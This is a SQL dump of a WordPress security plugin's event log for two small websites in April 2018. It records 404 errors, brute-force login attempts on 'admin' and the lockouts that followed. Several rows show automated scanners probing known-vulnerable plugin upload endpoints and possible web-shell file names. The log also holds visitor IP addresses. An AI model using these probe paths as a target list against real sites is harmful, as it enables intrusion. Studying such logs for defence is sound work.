(85553, 'four_oh_four', '404 Error', 3, '2018-04-24 06:17:52', '2018-04-24 11:17:52', '24.235.38.44', '', 0, '/apple-touch-icon-120x120-precomposed.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85554, 'four_oh_four', '404 Error', 3, '2018-04-24 06:17:53', '2018-04-24 11:17:53', '24.235.38.44', '', 0, '/apple-touch-icon-120x120.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85555, 'four_oh_four', '404 Error', 3, '2018-04-24 06:21:07', '2018-04-24 11:21:07', '185.86.164.98', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85556, 'four_oh_four', '404 Error', 3, '2018-04-24 06:25:50', '2018-04-24 11:25:50', '104.220.105.69', '', 0, '/apple-touch-icon-120x120-precomposed.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85557, 'four_oh_four', '404 Error', 3, '2018-04-24 06:25:51', '2018-04-24 11:25:51', '104.220.105.69', '', 0, '/apple-touch-icon-120x120.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85558, 'four_oh_four', '404 Error', 3, '2018-04-24 06:25:54', '2018-04-24 11:25:54', '104.220.105.69', '', 0, '/apple-touch-icon-120x120-precomposed.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85559, 'four_oh_four', '404 Error', 3, '2018-04-24 06:25:55', '2018-04-24 11:25:55', '104.220.105.69', '', 0, '/apple-touch-icon-120x120.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85560, 'four_oh_four', '404 Error', 3, '2018-04-24 06:39:28', '2018-04-24 11:39:28', '193.106.30.99', '', 0, '/info.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85561, 'four_oh_four', '404 Error', 3, '2018-04-24 06:43:17', '2018-04-24 11:43:17', '185.86.164.110', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85562, 'four_oh_four', '404 Error', 3, '2018-04-24 06:54:01', '2018-04-24 11:54:01', '103.14.88.102', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85563, 'four_oh_four', '404 Error', 3, '2018-04-24 07:34:52', '2018-04-24 12:34:52', '66.249.69.96', '', 0, '/ads.txt', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85564, 'four_oh_four', '404 Error', 3, '2018-04-24 07:38:59', '2018-04-24 12:38:59', '1.32.78.137', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85565, 'four_oh_four', '404 Error', 3, '2018-04-24 08:22:20', '2018-04-24 13:22:20', '185.86.164.101', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85566, 'four_oh_four', '404 Error', 3, '2018-04-24 08:23:14', '2018-04-24 13:23:14', '185.86.164.101', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85567, 'four_oh_four', '404 Error', 3, '2018-04-24 08:32:14', '2018-04-24 13:32:14', '94.180.92.7', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85568, 'four_oh_four', '404 Error', 3, '2018-04-24 08:53:53', '2018-04-24 13:53:53', '109.203.109.210', '', 0, '/wp-content/plugins/simple-ads-manager/js/slider/tmpl.js', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85569, 'four_oh_four', '404 Error', 3, '2018-04-24 08:53:54', '2018-04-24 13:53:54', '109.203.109.210', '', 0, '/wp-content/plugins/wp-mobile-detector/cache/db.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85570, 'four_oh_four', '404 Error', 3, '2018-04-24 08:53:55', '2018-04-24 13:53:55', '109.203.109.210', '', 0, '/wp-content/plugins/formcraft/file-upload/server/php/upload.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85571, 'four_oh_four', '404 Error', 3, '2018-04-24 08:53:59', '2018-04-24 13:53:59', '109.203.109.210', '', 0, '/wp-content/plugins/wp-symposium/server/php/wusYGQjqCIksvy.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85572, 'four_oh_four', '404 Error', 3, '2018-04-24 09:10:51', '2018-04-24 14:10:51', '185.86.164.108', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85573, 'four_oh_four', '404 Error', 3, '2018-04-24 09:23:09', '2018-04-24 14:23:09', '167.114.43.90', '', 0, '/not_found', 'http://clearyourbeliefs.com/wp-login.php?action=register', 'a:1:{s:12:"query_string";s:0:"";}'),
(85574, 'four_oh_four', '404 Error', 3, '2018-04-24 09:23:14', '2018-04-24 14:23:14', '167.114.43.90', '', 0, '/not_found', 'http://clearyourbeliefs.com/not_found', 'a:1:{s:12:"query_string";s:15:"action=register";}'),
(85575, 'four_oh_four', '404 Error', 3, '2018-04-24 09:36:12', '2018-04-24 14:36:12', '193.106.30.99', '', 0, '/global-belief-relief/6c3feced5fe97be15edcefad3cdc76e7.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85576, 'four_oh_four', '404 Error', 3, '2018-04-24 09:37:39', '2018-04-24 14:37:39', '91.200.12.193', '', 0, '/global-belief-relief/wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php', 'http://globalbeliefrelief.com/wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php', 'a:1:{s:12:"query_string";s:0:"";}'),
(85577, 'four_oh_four', '404 Error', 3, '2018-04-24 09:37:41', '2018-04-24 14:37:41', '185.86.164.108', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85578, 'four_oh_four', '404 Error', 3, '2018-04-24 09:54:44', '2018-04-24 14:54:44', '203.187.235.74', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85579, 'four_oh_four', '404 Error', 3, '2018-04-24 10:01:21', '2018-04-24 15:01:21', '203.187.235.74', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85580, 'four_oh_four', '404 Error', 3, '2018-04-24 10:04:59', '2018-04-24 15:04:59', '185.86.164.100', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85581, 'four_oh_four', '404 Error', 3, '2018-04-24 10:09:12', '2018-04-24 15:09:12', '91.200.12.193', '', 0, '/global-belief-relief/plugins/jquery-file-upload/server/php/', 'http://globalbeliefrelief.com/plugins/jquery-file-upload/server/php/', 'a:1:{s:12:"query_string";s:0:"";}'),
(85582, 'four_oh_four', '404 Error', 3, '2018-04-24 10:30:39', '2018-04-24 15:30:39', '193.106.30.99', '', 0, '/6c3feced5fe97be15edcefad3cdc76e7.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85583, 'four_oh_four', '404 Error', 3, '2018-04-24 10:30:42', '2018-04-24 15:30:42', '185.86.164.101', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85584, 'four_oh_four', '404 Error', 3, '2018-04-24 11:25:51', '2018-04-24 16:25:51', '111.206.198.26', '', 0, '/wp-content/plugins/ready-ecommerce/templates/standard/img/tb-close.png', 'http://clearyourbeliefs.com/wp-content/plugins/ready-ecommerce/templates/standard/subScreen.css?ver=4.8.6', 'a:1:{s:12:"query_string";s:0:"";}'),
(85585, 'four_oh_four', '404 Error', 3, '2018-04-24 11:58:06', '2018-04-24 16:58:06', '185.85.191.196', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85586, 'four_oh_four', '404 Error', 3, '2018-04-24 12:02:26', '2018-04-24 17:02:26', '46.23.45.133', '', 0, '/global-belief-relief/wp-content/plugins/userpro/css/userpro-editor.css', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85587, 'four_oh_four', '404 Error', 3, '2018-04-24 12:10:46', '2018-04-24 17:10:46', '216.244.66.234', '', 0, '/author/maria/page/45/marcopoloslots.com', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85588, 'four_oh_four', '404 Error', 3, '2018-04-24 12:13:47', '2018-04-24 17:13:47', '185.86.164.107', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85589, 'four_oh_four', '404 Error', 3, '2018-04-24 12:17:29', '2018-04-24 17:17:29', '185.119.81.11', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85590, 'four_oh_four', '404 Error', 3, '2018-04-24 12:25:25', '2018-04-24 17:25:25', '157.55.39.122', '', 0, '/wp-content/uploads/2014/03/the-clear-your-beliefs-guidebook.pdf', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85591, 'four_oh_four', '404 Error', 3, '2018-04-24 12:37:08', '2018-04-24 17:37:08', '216.244.66.234', '', 0, '/author/maria/page/45/russiaslot.com', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85592, 'four_oh_four', '404 Error', 3, '2018-04-24 12:39:53', '2018-04-24 17:39:53', '185.85.190.132', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85593, 'four_oh_four', '404 Error', 3, '2018-04-24 12:45:18', '2018-04-24 17:45:18', '185.86.164.98', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85594, 'four_oh_four', '404 Error', 3, '2018-04-24 13:06:42', '2018-04-24 18:06:42', '24.235.38.44', '', 0, '/apple-touch-icon-120x120-precomposed.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85595, 'four_oh_four', '404 Error', 3, '2018-04-24 13:06:43', '2018-04-24 18:06:43', '24.235.38.44', '', 0, '/apple-touch-icon-120x120.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85596, 'four_oh_four', '404 Error', 3, '2018-04-24 13:06:46', '2018-04-24 18:06:46', '24.235.38.44', '', 0, '/apple-touch-icon-120x120-precomposed.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85597, 'four_oh_four', '404 Error', 3, '2018-04-24 13:06:47', '2018-04-24 18:06:47', '24.235.38.44', '', 0, '/apple-touch-icon-120x120.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85598, 'four_oh_four', '404 Error', 3, '2018-04-24 13:36:17', '2018-04-24 18:36:17', '45.120.6.235', '', 0, '/not_found', 'http://clearyourbeliefs.com/wp-login.php?action=register', 'a:1:{s:12:"query_string";s:0:"";}'),
(85599, 'four_oh_four', '404 Error', 3, '2018-04-24 13:36:18', '2018-04-24 18:36:18', '45.120.6.235', '', 0, '/not_found', 'http://clearyourbeliefs.com/not_found', 'a:1:{s:12:"query_string";s:15:"action=register";}'),
(85600, 'four_oh_four', '404 Error', 3, '2018-04-24 13:55:49', '2018-04-24 18:55:49', '185.85.191.201', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85601, 'four_oh_four', '404 Error', 3, '2018-04-24 14:11:14', '2018-04-24 19:11:14', '196.247.17.129', '', 0, '/not_found', 'http://clearyourbeliefs.com/wp-login.php?action=register', 'a:1:{s:12:"query_string";s:0:"";}'),
(85602, 'four_oh_four', '404 Error', 3, '2018-04-24 14:11:15', '2018-04-24 19:11:15', '196.247.17.129', '', 0, '/not_found', 'http://clearyourbeliefs.com/not_found', 'a:1:{s:12:"query_string";s:15:"action=register";}'),
(85603, 'four_oh_four', '404 Error', 3, '2018-04-24 14:23:49', '2018-04-24 19:23:49', '193.106.30.99', '', 0, '/missok.php', '', 'a:1:{s:12:"query_string";s:3:"x=1";}'),
(85604, 'four_oh_four', '404 Error', 3, '2018-04-24 15:06:23', '2018-04-24 20:06:23', '181.191.118.254', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85605, 'four_oh_four', '404 Error', 3, '2018-04-24 15:22:39', '2018-04-24 20:22:39', '104.220.105.69', '', 0, '/apple-touch-icon-120x120-precomposed.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85606, 'four_oh_four', '404 Error', 3, '2018-04-24 15:22:40', '2018-04-24 20:22:40', '104.220.105.69', '', 0, '/apple-touch-icon-120x120.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85607, 'four_oh_four', '404 Error', 3, '2018-04-24 15:22:43', '2018-04-24 20:22:43', '104.220.105.69', '', 0, '/apple-touch-icon-120x120-precomposed.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85608, 'four_oh_four', '404 Error', 3, '2018-04-24 15:22:44', '2018-04-24 20:22:44', '104.220.105.69', '', 0, '/apple-touch-icon-120x120.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85348, 'file_change', 'File Changes Detected', 8, '2018-04-22 16:41:05', '2018-04-22 21:41:05', '', '', 0, '', '', 'a:4:{s:5:"added";a:0:{}s:7:"removed";a:0:{}s:7:"changed";a:0:{}s:6:"memory";s:5:"25.44";}'),
(85609, 'four_oh_four', '404 Error', 3, '2018-04-24 15:32:41', '2018-04-24 20:32:41', '216.244.66.234', '', 0, '/author/maria/page/45/aztek-avtomat.com', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85610, 'four_oh_four', '404 Error', 3, '2018-04-24 15:32:53', '2018-04-24 20:32:53', '185.86.164.103', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85611, 'four_oh_four', '404 Error', 3, '2018-04-24 15:38:16', '2018-04-24 20:38:16', '185.86.164.101', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}');
INSERT INTO `cyb_itsec_log` (`log_id`, `log_type`, `log_function`, `log_priority`, `log_date`, `log_date_gmt`, `log_host`, `log_username`, `log_user`, `log_url`, `log_referrer`, `log_data`) VALUES
(85612, 'four_oh_four', '404 Error', 3, '2018-04-24 15:46:31', '2018-04-24 20:46:31', '23.250.115.160', '', 0, '/not_found', 'http://clearyourbeliefs.com/wp-login.php?action=register', 'a:1:{s:12:"query_string";s:0:"";}'),
(85613, 'four_oh_four', '404 Error', 3, '2018-04-24 15:46:32', '2018-04-24 20:46:32', '23.250.115.160', '', 0, '/not_found', 'http://clearyourbeliefs.com/not_found', 'a:1:{s:12:"query_string";s:15:"action=register";}'),
(85614, 'four_oh_four', '404 Error', 3, '2018-04-24 16:02:44', '2018-04-24 21:02:44', '187.190.153.50', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85615, 'four_oh_four', '404 Error', 3, '2018-04-24 16:04:06', '2018-04-24 21:04:06', '185.86.164.106', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85616, 'four_oh_four', '404 Error', 3, '2018-04-24 16:04:34', '2018-04-24 21:04:34', '185.86.164.104', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85617, 'four_oh_four', '404 Error', 3, '2018-04-24 16:21:58', '2018-04-24 21:21:58', '98.143.159.174', '', 0, '/not_found', 'http://clearyourbeliefs.com/wp-login.php?action=register', 'a:1:{s:12:"query_string";s:0:"";}'),
(85618, 'four_oh_four', '404 Error', 3, '2018-04-24 16:21:59', '2018-04-24 21:21:59', '98.143.159.174', '', 0, '/not_found', 'http://clearyourbeliefs.com/not_found', 'a:1:{s:12:"query_string";s:15:"action=register";}'),
(86018, 'four_oh_four', '404 Error', 3, '2018-04-27 03:01:52', '2018-04-27 08:01:52', '185.86.167.4', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86017, 'four_oh_four', '404 Error', 3, '2018-04-27 02:45:51', '2018-04-27 07:45:51', '185.85.238.244', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86015, 'four_oh_four', '404 Error', 3, '2018-04-27 02:24:49', '2018-04-27 07:24:49', '185.86.164.104', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86016, 'four_oh_four', '404 Error', 3, '2018-04-27 02:41:21', '2018-04-27 07:41:21', '185.86.164.99', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86014, 'four_oh_four', '404 Error', 3, '2018-04-27 02:10:44', '2018-04-27 07:10:44', '185.86.13.213', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86013, 'four_oh_four', '404 Error', 3, '2018-04-27 02:02:04', '2018-04-27 07:02:04', '185.86.164.103', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86012, 'four_oh_four', '404 Error', 3, '2018-04-27 01:59:48', '2018-04-27 06:59:48', '185.86.164.110', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86011, 'four_oh_four', '404 Error', 3, '2018-04-27 01:55:21', '2018-04-27 06:55:21', '66.249.69.102', '', 0, '/ads.txt', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86009, 'four_oh_four', '404 Error', 3, '2018-04-27 01:33:31', '2018-04-27 06:33:31', '37.159.40.24', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86010, 'four_oh_four', '404 Error', 3, '2018-04-27 01:48:07', '2018-04-27 06:48:07', '185.86.167.4', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86008, 'four_oh_four', '404 Error', 3, '2018-04-27 01:30:26', '2018-04-27 06:30:26', '185.86.164.98', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86007, 'four_oh_four', '404 Error', 3, '2018-04-27 01:26:52', '2018-04-27 06:26:52', '185.86.164.106', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86006, 'four_oh_four', '404 Error', 3, '2018-04-27 01:00:46', '2018-04-27 06:00:46', '178.140.52.216', '', 0, '/wp-content/plugins/ready-ecommerce/templates/img/ok-icon.png', 'http://clearyourbeliefs.com/well-hidden-secret/', 'a:1:{s:12:"query_string";s:0:"";}'),
(86005, 'four_oh_four', '404 Error', 3, '2018-04-27 01:00:46', '2018-04-27 06:00:46', '178.140.52.216', '', 0, '/wp-content/plugins/ready-ecommerce/templates/standard/img/tb-close.png', 'http://clearyourbeliefs.com/well-hidden-secret/', 'a:1:{s:12:"query_string";s:0:"";}'),
(86004, 'four_oh_four', '404 Error', 3, '2018-04-27 00:59:38', '2018-04-27 05:59:38', '154.16.28.232', '', 0, '/not_found', 'http://clearyourbeliefs.com/not_found', 'a:1:{s:12:"query_string";s:15:"action=register";}'),
(86003, 'four_oh_four', '404 Error', 3, '2018-04-27 00:59:37', '2018-04-27 05:59:37', '154.16.28.232', '', 0, '/not_found', 'http://clearyourbeliefs.com/wp-login.php?action=register', 'a:1:{s:12:"query_string";s:0:"";}'),
(86002, 'lockout', 'Host or User Lockout', 10, '2018-04-27 00:21:34', '2018-04-27 05:21:34', '95.181.179.221', '', 0, '', '', 'a:3:{s:7:"expires";s:19:"2018-04-27 00:36:34";s:11:"expires_gmt";s:19:"2018-04-27 05:36:34";s:4:"type";s:12:"four_oh_four";}'),
(86001, 'four_oh_four', '404 Error', 3, '2018-04-27 00:21:34', '2018-04-27 05:21:34', '95.181.179.221', '', 0, '/wp-content/plugins/gallery-plugin/gallery-plugin.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86000, 'four_oh_four', '404 Error', 3, '2018-04-27 00:21:34', '2018-04-27 05:21:34', '95.181.179.221', '', 0, '/wp-content/plugins/wpmarketplace/readme.txt', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85999, 'four_oh_four', '404 Error', 3, '2018-04-27 00:21:34', '2018-04-27 05:21:34', '95.181.179.221', '', 0, '/wp-content/plugins/user-meta/readme.txt', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85998, 'four_oh_four', '404 Error', 3, '2018-04-27 00:21:34', '2018-04-27 05:21:34', '95.181.179.221', '', 0, '/wp-content/plugins/user-avatar/readme.txt', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85997, 'four_oh_four', '404 Error', 3, '2018-04-27 00:21:34', '2018-04-27 05:21:34', '95.181.179.221', '', 0, '/wp-content/plugins/wp-image-news-slider/functions.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85996, 'four_oh_four', '404 Error', 3, '2018-04-27 00:21:33', '2018-04-27 05:21:33', '95.181.179.221', '', 0, '/wp-content/plugins/zingiri-web-shop/admin.css', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85995, 'four_oh_four', '404 Error', 3, '2018-04-27 00:21:33', '2018-04-27 05:21:33', '95.181.179.221', '', 0, '/wp-content/plugins/wp-property/action_hooks.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85994, 'four_oh_four', '404 Error', 3, '2018-04-27 00:21:33', '2018-04-27 05:21:33', '95.181.179.221', '', 0, '/wp-content/plugins/front-end-upload/destination.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85993, 'four_oh_four', '404 Error', 3, '2018-04-27 00:21:33', '2018-04-27 05:21:33', '95.181.179.221', '', 0, '/wp-content/plugins/nextgen-gallery/changelog.txt', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85992, 'four_oh_four', '404 Error', 3, '2018-04-27 00:21:32', '2018-04-27 05:21:32', '95.181.179.221', '', 0, '/wp-content/plugins/cimy-user-extra-fields/README_OFFICIAL.txt', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85991, 'four_oh_four', '404 Error', 3, '2018-04-27 00:21:32', '2018-04-27 05:21:32', '95.181.179.221', '', 0, '/wp-content/plugins/resume-submissions-job-postings/installer.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85990, 'four_oh_four', '404 Error', 3, '2018-04-27 00:21:32', '2018-04-27 05:21:32', '95.181.179.221', '', 0, '/wp-content/plugins/wpmarketplace/readme.txt', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85989, 'four_oh_four', '404 Error', 3, '2018-04-27 00:21:32', '2018-04-27 05:21:32', '95.181.179.221', '', 0, '/wp-content/plugins/custom-content-type-manager/index.html', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85988, 'four_oh_four', '404 Error', 3, '2018-04-27 00:21:32', '2018-04-27 05:21:32', '95.181.179.221', '', 0, '/wp-content/plugins/font-uploader/font-uploader-free.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85987, 'four_oh_four', '404 Error', 3, '2018-04-27 00:21:32', '2018-04-27 05:21:32', '95.181.179.221', '', 0, '/wp-content/plugins/front-end-upload/destination.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85986, 'four_oh_four', '404 Error', 3, '2018-04-27 00:21:32', '2018-04-27 05:21:32', '95.181.179.221', '', 0, '/wp-content/plugins/simple-dropbox-upload-form/', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85985, 'four_oh_four', '404 Error', 3, '2018-04-27 00:21:30', '2018-04-27 05:21:30', '95.181.179.221', '', 0, '/wp-content/plugins/fcchat/default.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85984, 'four_oh_four', '404 Error', 3, '2018-04-27 00:21:30', '2018-04-27 05:21:30', '95.181.179.221', '', 0, '/wp-content/plugins/contact-form-7/license.txt', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85983, 'four_oh_four', '404 Error', 3, '2018-04-27 00:21:29', '2018-04-27 05:21:29', '95.181.179.221', '', 0, '/wp-content/plugins/auto-attachments/a-a.css', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85982, 'four_oh_four', '404 Error', 3, '2018-04-27 00:21:29', '2018-04-27 05:21:29', '95.181.179.221', '', 0, '/wp-content/plugins/magic-fields/MF_Constant.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85981, 'four_oh_four', '404 Error', 3, '2018-04-27 00:21:29', '2018-04-27 05:21:29', '95.181.179.221', '', 0, '/wp-content/plugins/category-grid-view-gallery/cat_grid.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85980, 'four_oh_four', '404 Error', 3, '2018-04-27 00:21:29', '2018-04-27 05:21:29', '95.181.179.221', '', 0, '/wp-content/plugins/wpstorecart/lgpl.txt', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85979, 'four_oh_four', '404 Error', 3, '2018-04-27 00:21:29', '2018-04-27 05:21:29', '95.181.179.221', '', 0, '/wp-content/plugins/nmedia-user-file-uploader/readme.txt', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85978, 'four_oh_four', '404 Error', 3, '2018-04-27 00:18:44', '2018-04-27 05:18:44', '185.86.164.101', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85977, 'four_oh_four', '404 Error', 3, '2018-04-26 23:57:42', '2018-04-27 04:57:42', '193.226.56.87', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85976, 'four_oh_four', '404 Error', 3, '2018-04-26 23:46:32', '2018-04-27 04:46:32', '31.14.75.47', '', 0, '/not_found', 'http://clearyourbeliefs.com/not_found', 'a:1:{s:12:"query_string";s:15:"action=register";}'),
(85975, 'four_oh_four', '404 Error', 3, '2018-04-26 23:46:31', '2018-04-27 04:46:31', '31.14.75.47', '', 0, '/not_found', 'http://clearyourbeliefs.com/wp-login.php?action=register', 'a:1:{s:12:"query_string";s:0:"";}'),
(85974, 'four_oh_four', '404 Error', 3, '2018-04-26 23:26:18', '2018-04-27 04:26:18', '104.220.105.69', '', 0, '/apple-touch-icon-120x120.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85973, 'four_oh_four', '404 Error', 3, '2018-04-26 23:26:17', '2018-04-27 04:26:17', '104.220.105.69', '', 0, '/apple-touch-icon-120x120-precomposed.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85972, 'four_oh_four', '404 Error', 3, '2018-04-26 23:26:15', '2018-04-27 04:26:15', '104.220.105.69', '', 0, '/apple-touch-icon-120x120.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85971, 'four_oh_four', '404 Error', 3, '2018-04-26 23:26:14', '2018-04-27 04:26:14', '104.220.105.69', '', 0, '/apple-touch-icon-120x120-precomposed.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85970, 'four_oh_four', '404 Error', 3, '2018-04-26 23:23:22', '2018-04-27 04:23:22', '185.85.238.244', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85969, 'four_oh_four', '404 Error', 3, '2018-04-26 23:10:37', '2018-04-27 04:10:37', '185.85.238.244', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85967, 'four_oh_four', '404 Error', 3, '2018-04-26 22:29:54', '2018-04-27 03:29:54', '185.85.239.195', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85968, 'four_oh_four', '404 Error', 3, '2018-04-26 22:46:25', '2018-04-27 03:46:25', '185.85.190.132', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85966, 'four_oh_four', '404 Error', 3, '2018-04-26 22:19:51', '2018-04-27 03:19:51', '185.85.239.110', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85964, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-26 21:41:08', '2018-04-27 02:41:08', '85.248.227.164', 'admin', 0, '', '', 'a:0:{}'),
(85965, 'four_oh_four', '404 Error', 3, '2018-04-26 21:55:33', '2018-04-27 02:55:33', '185.86.164.106', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85963, 'lockout', 'Host or User Lockout', 10, '2018-04-26 21:41:08', '2018-04-27 02:41:08', '85.248.227.164', '', 0, '', '', 'a:3:{s:7:"expires";s:19:"2018-04-26 21:56:08";s:11:"expires_gmt";s:19:"2018-04-27 02:56:08";s:4:"type";s:11:"brute_force";}'),
(85962, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-26 21:41:08', '2018-04-27 02:41:08', '85.248.227.164', 'admin', 0, '', '', 'a:0:{}'),
(85960, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-26 21:41:08', '2018-04-27 02:41:08', '85.248.227.164', 'admin', 0, '', '', 'a:0:{}'),
(85961, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-26 21:41:08', '2018-04-27 02:41:08', '85.248.227.164', 'admin', 0, '', '', 'a:0:{}'),
(85959, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-26 21:41:08', '2018-04-27 02:41:08', '85.248.227.164', 'admin', 0, '', '', 'a:0:{}'),
(85958, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-26 21:41:08', '2018-04-27 02:41:08', '85.248.227.164', 'admin', 0, '', '', 'a:0:{}'),
(85957, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-26 21:41:08', '2018-04-27 02:41:08', '85.248.227.164', 'admin', 0, '', '', 'a:0:{}'),
(85956, 'four_oh_four', '404 Error', 3, '2018-04-26 20:58:02', '2018-04-27 01:58:02', '103.199.17.24', '', 0, '/not_found', 'http://clearyourbeliefs.com/not_found', 'a:1:{s:12:"query_string";s:15:"action=register";}'),
(85955, 'four_oh_four', '404 Error', 3, '2018-04-26 20:58:01', '2018-04-27 01:58:01', '103.199.17.24', '', 0, '/not_found', 'http://clearyourbeliefs.com/wp-login.php?action=register', 'a:1:{s:12:"query_string";s:0:"";}'),
(85954, 'four_oh_four', '404 Error', 3, '2018-04-26 20:56:27', '2018-04-27 01:56:27', '185.86.164.108', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85953, 'four_oh_four', '404 Error', 3, '2018-04-26 20:53:26', '2018-04-27 01:53:26', '185.85.191.196', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
